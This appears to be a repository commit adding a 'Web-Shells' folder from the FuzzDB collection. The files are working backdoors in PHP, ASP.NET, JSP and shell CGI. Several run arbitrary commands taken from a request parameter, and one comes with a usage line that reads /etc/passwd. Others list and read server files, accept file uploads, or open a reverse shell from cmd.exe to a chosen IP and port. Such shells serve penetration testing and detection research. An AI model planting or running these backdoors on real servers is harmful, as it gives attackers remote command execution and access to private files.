Add "Web-Shells"

Web-Shells/FuzzDB/cmd-simple.php

@@ -0,0 +1,17 @@
+<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->
+
+<?php
+
+if(isset($_REQUEST['cmd'])){
+        echo "<pre>";
+        $cmd = ($_REQUEST['cmd']);
+        system($cmd);
+        echo "</pre>";
+        die;
+}
+
+?>
+
+Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
+
+<!--    http://michaeldaw.org   2006    -->

Web-Shells/FuzzDB/cmd.aspx

@@ -0,0 +1,42 @@
+<%@ Page Language="C#" Debug="true" Trace="false" %>
+<%@ Import Namespace="System.Diagnostics" %>
+<%@ Import Namespace="System.IO" %>
+<script Language="c#" runat="server">
+void Page_Load(object sender, EventArgs e)
+{
+}
+string ExcuteCmd(string arg)
+{
+ProcessStartInfo psi = new ProcessStartInfo();
+psi.FileName = "cmd.exe";
+psi.Arguments = "/c "+arg;
+psi.RedirectStandardOutput = true;
+psi.UseShellExecute = false;
+Process p = Process.Start(psi);
+StreamReader stmrdr = p.StandardOutput;
+string s = stmrdr.ReadToEnd();
+stmrdr.Close();
+return s;
+}
+void cmdExe_Click(object sender, System.EventArgs e)
+{
+Response.Write("<pre>");
+Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));
+Response.Write("</pre>");
+}
+</script>
+<HTML>
+<HEAD>
+<title>awen asp.net webshell</title>
+</HEAD>
+<body >
+<form id="cmd" method="post" runat="server">
+<asp:TextBox id="txtArg" style="Z-INDEX: 101; LEFT: 405px; POSITION: absolute; TOP: 20px" runat="server" Width="250px"></asp:TextBox>
+<asp:Button id="testing" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button>
+<asp:Label id="lblText" style="Z-INDEX: 103; LEFT: 310px; POSITION: absolute; TOP: 22px" runat="server">Command:</asp:Label>
+</form>
+</body>
+</HTML>
+
+<!-- Contributed by Dominic Chell (http://digitalapocalypse.blogspot.com/) -->
+<!--    http://michaeldaw.org   04/2007    -->

Web-Shells/FuzzDB/cmd.jsp

@@ -0,0 +1,35 @@
+<%@ page import="java.util.*,java.io.*"%>
+<%
+//
+// JSP_KIT
+//
+// cmd.jsp = Command Execution (unix)
+//
+// by: Unknown
+// modified: 27/06/2003
+//
+%>
+<HTML><BODY>
+<FORM METHOD="GET" NAME="myform" ACTION="">
+<INPUT TYPE="text" NAME="cmd">
+<INPUT TYPE="submit" VALUE="Send">
+</FORM>
+<pre>
+<%
+if (request.getParameter("cmd") != null) {
+        out.println("Command: " + request.getParameter("cmd") + "<BR>");
+        Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
+        OutputStream os = p.getOutputStream();
+        InputStream in = p.getInputStream();
+        DataInputStream dis = new DataInputStream(in);
+        String disr = dis.readLine();
+        while ( disr != null ) {
+                out.println(disr); 
+                disr = dis.readLine(); 
+                }
+        }
+%>
+</pre>
+</BODY></HTML>
+
+

Web-Shells/FuzzDB/cmd.php

@@ -0,0 +1,25 @@
+<?
+//
+// PHP_KIT
+//
+// cmd.php = Command Execution
+//
+// by: The Dark Raver
+// modified: 21/01/2004
+//
+?>
+<HTML><BODY>
+<FORM METHOD="GET" NAME="myform" ACTION="">
+<INPUT TYPE="text" NAME="cmd">
+<INPUT TYPE="submit" VALUE="Send">
+</FORM>
+<pre>
+<?
+if($_GET['cmd']) {
+  system($_GET['cmd']);
+  }
+?>
+</pre>
+</BODY></HTML>
+
+

Web-Shells/FuzzDB/cmd.sh

@@ -0,0 +1,372 @@
+#!/bin/sh
+#
+# SH_KIT
+#
+# cmd.sh = Command Execution
+#
+# by: Ludoz
+# modified: 23/04/2004
+#
+# Version 1.2 - 28/5/2003
+#
+
+###
+###
+### Configuracion
+###
+###
+
+#
+# sitios donde buscar ejecutables necesarios, sin la / posterior, separados por espacios
+#
+PATHS="/bin /usr/bin /sbin /usr/sbin /usr/local/bin /usr/local/sbin /usr/ucb /usr/libexec /tmp /usr/tmp /var/tmp ."
+
+###
+###
+### La configuracion acaba aqui
+###
+###
+
+#
+# PATHs mas habituales de los 3 comandos base
+#
+TEST="/usr/bin/test"
+BASENAME="/bin/basename"
+DIRNAME="/usr/bin/dirname"
+
+# compruebo TEST, BASENAME y DIRNAME y si estan mal intento encontrarlas en el path y sino en PATHS
+if (eval $TEST \"1\" = \"1\" ); then
+  TEST=$TEST
+else
+  for i in $PATHS ; do
+    TEST="$i/test"
+    if (eval $TEST \"1\" = \"1\" ); then
+      break
+    fi
+  done
+  if (eval $TEST \"1\" = \"1\" ); then
+    TEST=$TEST
+  else
+    TEST=test
+    if (eval $TEST \"1\" = \"1\" ); then
+      TEST=$TEST
+    else
+      TEST=""
+      echo ERROR: No he encontrado TEST en el sitio especificado ni en el path
+      echo
+      exit
+    fi
+  fi
+fi
+
+if (eval $TEST \"`eval $BASENAME .`\" = \".\" ); then
+  BASENAME=$BASENAME
+else
+  for i in $PATHS ; do
+    BASENAME="$i/basename"
+    if (eval $TEST \"`eval $BASENAME .`\" = \".\" ); then
+      break
+    fi
+  done
+  if (eval $TEST \"`eval $BASENAME .`\" = \".\" ); then
+    BASENAME=$BASENAME
+  else
+    BASENAME=basename
+    if (eval $TEST \"`eval $BASENAME .`\" = \".\" ); then
+      BASENAME=$BASENAME
+    else
+      BASENAME=""
+      echo ERROR: No he encontrado BASENAME en el sitio especificado ni en el path
+      echo
+      exit
+    fi
+  fi
+fi
+
+if (eval $TEST \"`eval $DIRNAME .`\" = \".\" ); then
+  DIRNAME=$DIRNAME
+else
+  for i in $PATHS ; do
+    DIRNAME="$i/dirname"
+    if (eval $TEST \"`eval $DIRNAME .`\" = \".\" ); then
+      break
+    fi
+  done
+  if (eval $TEST \"`eval $DIRNAME .`\" = \".\" ); then
+    DIRNAME=$DIRNAME
+  else
+    DIRNAME=dirname
+    if (eval $TEST \"`eval $DIRNAME .`\" = \".\" ); then
+      DIRNAME=$DIRNAME
+    else
+      DIRNAME=""
+      echo ERROR: No he encontrado DIRNAME en el sitio especificado ni en el path
+      echo
+      exit
+    fi
+  fi
+fi
+
+#echo "Info: TEST: $TEST"
+#echo "Info: BASENAME: $BASENAME"
+#echo "Info: DIRNAME: $DIRNAME"
+
+if (eval $TEST -x \"/usr/bin/unalias\" ); then
+  # si existe el comando: unalias *
+  /usr/bin/unalias *
+else
+  # si es interno: unalias -a
+  unalias -a
+fi
+
+#
+# A partir de aqui deberia ser 100% multisistema
+#
+
+buscaexec ()
+{
+BUSCAEXECRES=""
+if (eval $TEST -z \"$BUSCAEXECPAR\" ); then
+  return;
+fi
+if (eval $TEST -x \"$BUSCAEXECPAR\" ); then
+  BUSCAEXECRES=$BUSCAEXECPAR
+  return;
+fi
+
+BUSCAEXECPAR=`eval $BASENAME $BUSCAEXECPAR`
+
+for i in $PATHS $PATH ; do 
+  if (eval $TEST -x \"$i/$BUSCAEXECPAR\" ); then
+    BUSCAEXECRES="$i/$BUSCAEXECPAR"
+    break
+  fi
+done
+
+if (eval $TEST -n \"$BUSCAEXECRES\" ); then
+  return;
+fi
+
+if (eval $TEST -z \"$WHICH\" ); then
+  return;
+fi
+
+BUSCAEXECRES=`eval $WHICH $BUSCAEXECPAR`
+if (eval $TEST -n \"$BUSCAEXECRES\" ); then
+  if (eval $TEST ! -x \"$BUSCAEXECRES\" ); then
+    BUSCAEXECRES=""
+  fi
+fi
+}
+
+
+#
+# Definicion de comandos concretos para el script
+#
+
+WHICH=""
+BUSCAEXECPAR=/usr/bin/which
+buscaexec
+WHICH=$BUSCAEXECRES
+
+if (eval $TEST -z \"$WHICH\" ) ; then
+  if (eval $TEST \"$TEST\" != \"test\" ) ; then
+    TESTCMD=$TEST
+    TESTRES="test"
+  elif (eval $TEST \"$BASENAME\" != \"basename\" ) ; then
+    TESTCMD=$BASENAME
+    TESTRES="basename"
+  elif (eval $TEST \"$BASEDIR\" != \"basedir\" ) ; then
+    TESTCMD=$BASEDIR
+    TESTRES="basename"
+  fi
+
+  if (eval $TEST -n \"$TESTCMD\"); then
+    OLDPATH=$PATH
+    
+    TESTPATH="`eval $BASEDIR $TESTCMD`"
+    PATH="$TESTPATH:$PATH"
+    TESTPATH=""
+    PRUEBA="`eval $BASENAME \"\`which $TESTRES\`\" `"
+    if (eval $TEST \"$PRUEBA\" = \"TESTRES\" ) ; then
+      WHICH="`which which`"
+    else
+      WHICH=""
+    fi
+    PRUEBA=""
+
+    PATH=$OLDPATH
+    OLDPATH=""
+    TESTRES=""
+    TESTCMD=""
+  fi
+
+fi
+
+BUSCAEXECPAR=/bin/echo
+buscaexec
+ECHO=$BUSCAEXECRES
+
+if (eval $TEST -z \"$ECHO\" ) ; then
+  ECHO=echo
+fi
+
+A="`eval $ECHO \"a\"`"
+if (eval $TEST \"$A\" = \"a\" ) ; then
+  ECHO=$ECHO
+else
+  ECHO=""
+#nota mental: para que hago echo si echo no funciona!? :)
+  echo ERROR: No he encontrado ECHO en el sitio especificado ni en el path
+  echo
+  exit
+fi
+A=""
+
+
+
+BUSCAEXECPAR=/bin/cut
+buscaexec
+CUT=$BUSCAEXECRES
+BUSCAEXECPAR=/bin/sed
+buscaexec
+SED=$BUSCAEXECRES
+BUSCAEXECPAR=/usr/bin/expr
+buscaexec
+EXPR=$BUSCAEXECRES
+
+
+FORMULARIO="`eval $BASENAME $0`"
+
+eval $ECHO \"Content-type: text/html\"
+eval $ECHO
+eval $ECHO \"\<html\>\<title\>CMD.SH\<\/title\>\<body\>\"
+eval $ECHO \"\<p\>\<form method\=\\\"GET\\\" name\=\\\"myform\\\" action\=\\\"$FORMULARIO\\\"\>\<\/p\>\"
+eval $ECHO \"\<input type\=\\\"text\\\" name\=\\\"cmd\\\"\>\"
+eval $ECHO \"\<input type\=\\\"submit\\\" value\=\\\"Enviar\\\"\>\"
+eval $ECHO \"\<pre\>\"
+
+#
+# La variable QUERYSTRING contiene la info que quiero
+#
+
+#echo QUERY_STRING=$QUERY_STRING
+if (eval $TEST -n \"$QUERY_STRING\"); then
+
+        PARAM=`eval $ECHO \"$QUERY_STRING\" | $CUT \-d\= \-f2 | $SED \-e s\/\+\/\ \/g `
+
+hex2dec()
+{
+if (eval $TEST \"$PARC\" \= \"0\" ); then
+	PARC="0"
+elif (eval $TEST \"$PARC\" \= \"1\" ); then
+	PARC="1"
+elif (eval $TEST \"$PARC\" \= \"2\" ); then
+	PARC="2"
+elif (eval $TEST \"$PARC\" \= \"3\" ); then
+	PARC="3"
+elif (eval $TEST \"$PARC\" \= \"4\" ); then
+	PARC="4"
+elif (eval $TEST \"$PARC\" \= \"5\" ); then
+	PARC="5"
+elif (eval $TEST \"$PARC\" \= \"6\" ); then
+	PARC="6"
+elif (eval $TEST \"$PARC\" \= \"7\" ); then
+	PARC="7"
+elif (eval $TEST \"$PARC\" \= \"8\" ); then
+	PARC="8"
+elif (eval $TEST \"$PARC\" \= \"9\" ); then
+	PARC="9"
+elif (eval $TEST \"$PARC\" \= \"a\" ); then
+	PARC="10"
+elif (eval $TEST \"$PARC\" \= \"b\" ); then
+	PARC="11"
+elif (eval $TEST \"$PARC\" \= \"c\" ); then
+	PARC="12"
+elif (eval $TEST \"$PARC\" \= \"d\" ); then
+	PARC="13"
+elif (eval $TEST \"$PARC\" \= \"e\" ); then
+	PARC="14"
+elif (eval $TEST \"$PARC\" \= \"f\" ); then
+	PARC="15"
+elif (eval $TEST \"$PARC\" \= \"A\" ); then
+	PARC="10"
+elif (eval $TEST \"$PARC\" \= \"B\" ); then
+	PARC="11"
+elif (eval $TEST \"$PARC\" \= \"C\" ); then
+	PARC="12"
+elif (eval $TEST \"$PARC\" \= \"D\" ); then
+	PARC="13"
+elif (eval $TEST \"$PARC\" \= \"E\" ); then
+	PARC="14"
+elif (eval $TEST \"$PARC\" \= \"F\" ); then
+	PARC="15"
+else
+	PARC="0"
+fi
+}
+
+dec2ascii()
+{
+if (eval $TEST \"$PARC\" -eq \"0\"); then
+  PARC=""
+elif (eval $TEST \"$PARC\" -lt \"32\"); then
+  PARC=""
+elif (eval $TEST \"$PARC\" -eq \"34\"); then
+  PARC="\\\""
+elif (eval $TEST \"$PARC\" -eq \"96\"); then
+  PARC="\`"
+elif (eval $TEST \"$PARC\" -eq \"127\"); then
+  PARC=""
+elif (eval $TEST \"$PARC\" -gt \"127\"); then
+  PARC=""
+else
+#aun no rulan todos los caracteres, los que faltan estan impresos en la linea inferior
+#                     XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX   "                                                                                 `                                    ?<- el resto se ignoran, son >128  
+  PARC="`eval $ECHO \"123456789ABCDEF0123456789ABCDEF \!X#\$%\&\'\(\)\*+,\-.\/0123456789\:\;\<=\>\?\@ABCDEFGHIJKLMNOPQRSTUVWXYZ\[\\\\\]\^_Xabcdefghijklmnopqrstuvwxyz\{\\\|\}\~X0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF\" | $CUT \-b$PARC `"
+# X: no printable, en la linea superior esta el caracter
+# los 0123456789ABCDEF es para no descontarme poniendo X cuando habia muchas seguidas
+# notese que el NULL no sale en el string
+# notese que la " y la ` estan como X en el string pq estan tratadas a parte, no se pueden tratar por el eval este
+# notese que los caracteres por debajo del 32 tampoco se tratan, y los mayores de 127 tampoco, aunque se pueden a<>adir... si tienes ganas ;) y los necesitas realmente
+fi
+}
+
+	TODO="$PARAM"
+	DONE=""
+
+	while (eval $TEST -n \"$TODO\" ); do
+
+		C=`eval $ECHO \"$TODO\" | $CUT \-b1 `
+
+		if (eval $TEST \"$C\" = \"\%\"); then
+			PARC="`eval $ECHO \"$TODO\" | $CUT \-b2 `"
+			hex2dec
+			C1="$PARC"
+			PARC="`eval $ECHO \"$TODO\" | $CUT \-b3 `"
+			hex2dec
+			C2="$PARC"
+			PARC="`eval $EXPR $C1 \\\* 16 \+ $C2`"
+			dec2ascii
+			C="$PARC"
+			TODO=`eval $ECHO \"$TODO\" | $CUT \-b4\- `
+		else
+			TODO=`eval $ECHO \"$TODO\" | $CUT \-b2\- `
+		fi
+	
+		DONE="$DONE$C"
+
+	done
+
+        VALUE="$DONE"
+
+	eval $ECHO \"\\\$ $VALUE\"
+	eval $VALUE
+
+fi
+
+eval $ECHO \"\<\/pre\>\<\/body\>\<\/html\>\"
+
+exit
+
+

Web-Shells/FuzzDB/list.jsp

@@ -0,0 +1,77 @@
+<%@ page import="java.util.*,java.io.*"%>
+<%
+//
+// JSP_KIT
+//
+// list.jsp = Directory & File View
+//
+// by: Sierra
+// modified: 27/06/2003
+//
+%>
+<%
+if(request.getParameter("file")==null) {
+	%>
+	<HTML><BODY>
+	<FORM METHOD="POST" NAME="myform" ACTION="">
+	<INPUT TYPE="text" NAME="file">
+	<INPUT TYPE="submit" VALUE="Send">
+	</FORM>
+	<%
+	}
+%>
+<% //read the file name.
+try { 
+File f = new File(request.getParameter("file"));
+if(f.isDirectory()) {
+	int i;
+	String fname = new String("Unknown");
+	String fcolor = new String("Black");
+	%>
+	<HTML><BODY>
+	<FONT Face="Courier New, Helvetica" Color="Black">
+	<%
+	out.print("<B>Path: <U>" + f.toString() + "</U></B><BR> <BR>");
+	File flist[] = f.listFiles();
+	for(i=0; i<flist.length; i++) {
+		fname = new String( flist[i].toString());
+		out.print("(");
+		if(flist[i].isDirectory() == true) {
+			out.print("d");
+			fname = fname + "/";
+			fcolor = new String("Blue");
+			} else if( flist[i].isFile() == true ) {
+			out.print("-");
+			fcolor = new String("Green");
+			} else {
+			out.print("?");
+			fcolor = new String("Red");
+			}
+		if(flist[i].canRead() == true) out.print("r" ); else out.print("-");
+		if(flist[i].canWrite() == true) out.print("w" ); else out.print("-");
+		out.print(") <A Style='Color: " + fcolor.toString() + ";' HRef='?file=" + fname.toString() + "'>" + fname.toString() + "</A> " + "( Size: " + flist[i].length() + " bytes)<BR>\n");
+		}
+	%>
+	</FONT></BODY></HTML>
+	<%
+
+	} else {
+	if(f.canRead() == true) {
+		InputStream in = new FileInputStream(f);
+		ServletOutputStream outs = response.getOutputStream();
+		int left = 0;
+			try {
+			while((left) >= 0 ) {
+				left = in.read(); 
+				outs.write(left);
+				}
+			} catch(IOException ex) {ex.printStackTrace();}
+		outs.flush();
+		outs.close();
+		in.close();	
+		} else {
+		out.print("Can't Read file<BR>");
+		}
+	}
+} catch(Exception ex) {ex.printStackTrace();}
+%>

Web-Shells/FuzzDB/list.php

@@ -0,0 +1,33 @@
+<?
+//
+// PHP_KIT
+//
+// list.php = Directory & File Listing
+//
+// by: The Dark Raver
+// modified: 21/01/2004
+//
+?>
+
+<?
+
+if($_GET['file']) {
+	$fichero=$_GET['file']; 
+	} else {
+	$fichero="/";
+	} 
+
+if($handle = @opendir($fichero)) {
+  while($filename = readdir($handle)) {
+    echo "( ) <a href=?file=" . $fichero . "/" . $filename . ">" . $filename . "</a><br>";
+    }
+  closedir($handle);
+  } else {
+  echo "FILE: " . $fichero . "<br><hr><pre>";
+  $fp = fopen($fichero, "r");
+  $buffer = fread($fp, filesize($fichero));
+  echo $buffer;
+  fclose($fp);
+  }
+
+?>

Web-Shells/FuzzDB/list.sh

@@ -0,0 +1,47 @@
+#!/bin/sh
+#
+# SH_KIT
+#
+# list.sh = Directory & File Listing
+#
+# by: The Dark Raver
+# modified: 16/12/2005
+#
+
+echo Content-Type: text/html
+echo
+
+if [ "$QUERY_STRING" != "" ]
+  then
+  echo PATH: $QUERY_STRING "<br><hr>"
+  echo `ls $QUERY_STRING` > /tmp/test
+  else
+  echo PATH: / "<br><hr>"
+  echo > /tmp/test
+  QUERY_STRING="/"
+  root="1"
+  fi
+
+out=`grep "/" /tmp/test`
+
+if [ "$out" != "" ]
+  then
+    echo FICHERO: $QUERY_STRING
+    echo "<hr><pre>"
+    cat $QUERY_STRING
+  else
+    if [ "$root" != "1" ]
+      then
+      echo "( ) <a href=?"$QUERY_STRING"/..>".."</a><br>"
+      fi
+    for i in `ls $QUERY_STRING`
+      do
+      if [ "$root" == "1" ] 
+        then 
+        echo "( ) <a href=?/"$i">"$i"</a><br>"
+        else 
+        echo "( ) <a href=?"$QUERY_STRING"/"$i">"$i"</a><br>"
+        fi
+      done
+
+  fi

Web-Shells/FuzzDB/reverse.jsp

@@ -0,0 +1,91 @@
+// backdoor.jsp
+// http://www.security.org.sg/code/jspreverse.html
+
+<%@
+page import="java.lang.*, java.util.*, java.io.*, java.net.*"
+% >
+<%!
+static class StreamConnector extends Thread
+{
+        InputStream is;
+        OutputStream os;
+
+        StreamConnector(InputStream is, OutputStream os)
+        {
+                this.is = is;
+                this.os = os;
+        }
+
+        public void run()
+        {
+                BufferedReader isr = null;
+                BufferedWriter osw = null;
+
+                try
+                {
+                        isr = new BufferedReader(new InputStreamReader(is));
+                        osw = new BufferedWriter(new OutputStreamWriter(os));
+
+                        char buffer[] = new char[8192];
+                        int lenRead;
+
+                        while( (lenRead = isr.read(buffer, 0, buffer.length)) > 0)
+                        {
+                                osw.write(buffer, 0, lenRead);
+                                osw.flush();
+                        }
+                }
+                catch (Exception ioe)
+
+                try
+                {
+                        if(isr != null) isr.close();
+                        if(osw != null) osw.close();
+                }
+                catch (Exception ioe)
+        }
+}
+%>
+
+<h1>JSP Backdoor Reverse Shell</h1>
+
+<form method="post">
+IP Address
+<input type="text" name="ipaddress" size=30>
+Port
+<input type="text" name="port" size=10>
+<input type="submit" name="Connect" value="Connect">
+</form>
+<p>
+<hr>
+
+<%
+String ipAddress = request.getParameter("ipaddress");
+String ipPort = request.getParameter("port");
+
+if(ipAddress != null && ipPort != null)
+{
+        Socket sock = null;
+        try
+        {
+                sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());
+
+                Runtime rt = Runtime.getRuntime();
+                Process proc = rt.exec("cmd.exe");
+
+                StreamConnector outputConnector =
+                        new StreamConnector(proc.getInputStream(),
+                                          sock.getOutputStream());
+
+                StreamConnector inputConnector =
+                        new StreamConnector(sock.getInputStream(),
+                                          proc.getOutputStream());
+
+                outputConnector.start();
+                inputConnector.start();
+        }
+        catch(Exception e) 
+}
+%>
+
+<!--    http://michaeldaw.org   2006    -->

Web-Shells/FuzzDB/up.php

@@ -0,0 +1,33 @@
+<?
+//
+// PHP_KIT
+//
+// up.php = File Upload
+//
+// by: The Dark Raver
+// modified: 21/01/2004
+//
+?>
+
+<html><body>
+
+<form enctype="multipart/form-data" action="" method="post">
+<input type="hidden" name="MAX_FILE_SIZE" value="1000000">
+<p>Local File: <input name="userfile" type="file">
+<p>Remote File: <input name="remotefile" type="text">
+<input type="submit" value="Send">
+</form><br><br><br>
+
+<?
+
+if(is_uploaded_file($HTTP_POST_FILES['userfile']['tmp_name'])) {
+   copy($HTTP_POST_FILES['userfile']['tmp_name'], $_POST['remotefile']);
+   echo "Uploaded file: " . $HTTP_POST_FILES['userfile']['name'];
+} else {
+   echo "No File Uploaded";
+}
+
+?>
+
+</html></body>
+

Web-Shells/FuzzDB/up.sh

@@ -0,0 +1,43 @@
+#!/bin/sh
+#
+# BETA1 - upload to /tmp/upload
+#
+# SH_KIT
+#
+# up.sh = File Upload
+#
+# by: The Dark Raver
+# modified: 16/12/2005
+#
+
+echo Content-Type: text/html
+echo
+
+echo "<html><body>"
+echo "<form enctype=\"multipart/form-data\" action=\"\" method=\"post\">"
+echo "<p>Local File: <input name=\"userfile\" type=\"file\">"
+echo "<input type=\"submit\" value=\"Send\">"
+echo "</form><br><br><br>"
+
+echo "<hr>"
+
+dd count=$CONTENT_LENGTH bs=1 of=/tmp/test
+
+lineas=`cat /tmp/test | wc -l`
+#echo LIN: $lineas
+lineas2=`expr $lineas - 4`
+#echo LIN2: $lineas2
+lineas3=`expr $lineas2 - 1`
+#echo LIN3: $lineas3
+
+#echo "<hr>"
+
+tail -$lineas2 /tmp/test > /tmp/test2
+head -$lineas3 /tmp/test2 > /tmp/upload
+#rm /tmp/test
+#rm /tmp/test2
+
+echo "<pre>"
+cat /tmp/upload
+echo "</pre>"
+